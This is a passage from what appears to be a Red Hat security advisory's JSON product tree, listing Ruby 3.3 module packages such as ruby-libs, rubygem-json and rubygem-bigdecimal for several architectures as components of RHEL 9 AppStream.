"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3"
},
"product_reference": "ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3"
},
"product_reference": "ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3"
},
"product_reference": "ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3"
},
"product_reference": "ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3"
},
"product_reference": "ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-default-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.noarch (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-default-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3"
},
"product_reference": "ruby-default-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3"
},
"product_reference": "ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3"
},
"product_reference": "ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3"
},
"product_reference": "ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3"
},
"product_reference": "ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3"
},
"product_reference": "ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-doc-0:3.3.10-6.module+el9.7.0+24248+66578cbb.noarch (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-doc-0:3.3.10-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3"
},
"product_reference": "ruby-doc-0:3.3.10-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3"
},
"product_reference": "ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3"
},
"product_reference": "ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3"
},
"product_reference": "ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3"
},
"product_reference": "ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3"
},
"product_reference": "ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3"
},
"product_reference": "ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3"
},
"product_reference": "ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3"
},
"product_reference": "ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3"
},
"product_reference": "ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3"
},
"product_reference": "ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3"
},
"product_reference": "rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3"
},
"product_reference": "rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3"
},
"product_reference": "rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3"
},
"product_reference": "rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3"
},
"product_reference": "rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3"
},
"product_reference": "rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3"
},
"product_reference": "rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3"
},
"product_reference": "rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3"
},
"product_reference": "rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3"
},
"product_reference": "rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bundler-0:2.5.22-6.module+el9.7.0+24248+66578cbb.noarch (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-bundler-0:2.5.22-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3"
},
"product_reference": "rubygem-bundler-0:2.5.22-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3"
},
"product_reference": "rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3"
},
"product_reference": "rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3"
},
"product_reference": "rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3"
},
"product_reference": "rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3"
},
"product_reference": "rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3"
},
"product_reference": "rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3"
},
"product_reference": "rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3"
},
"product_reference": "rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3"
},
"product_reference": "rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3"
},
"product_reference": "rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-irb-0:1.13.1-6.module+el9.7.0+24248+66578cbb.noarch (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-irb-0:1.13.1-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3"
},
"product_reference": "rubygem-irb-0:1.13.1-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3"
},
"product_reference": "rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3"
},
"product_reference": "rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3"
},
"product_reference": "rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3"
},
"product_reference": "rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3"
},
"product_reference": "rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3"
},
"product_reference": "rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3"
},
"product_reference": "rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3"
},
"product_reference": "rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.s390x (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3"
},
"product_reference": "rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3) as a component of Red Hat Enterprise Linux AppStream (v. 9)",
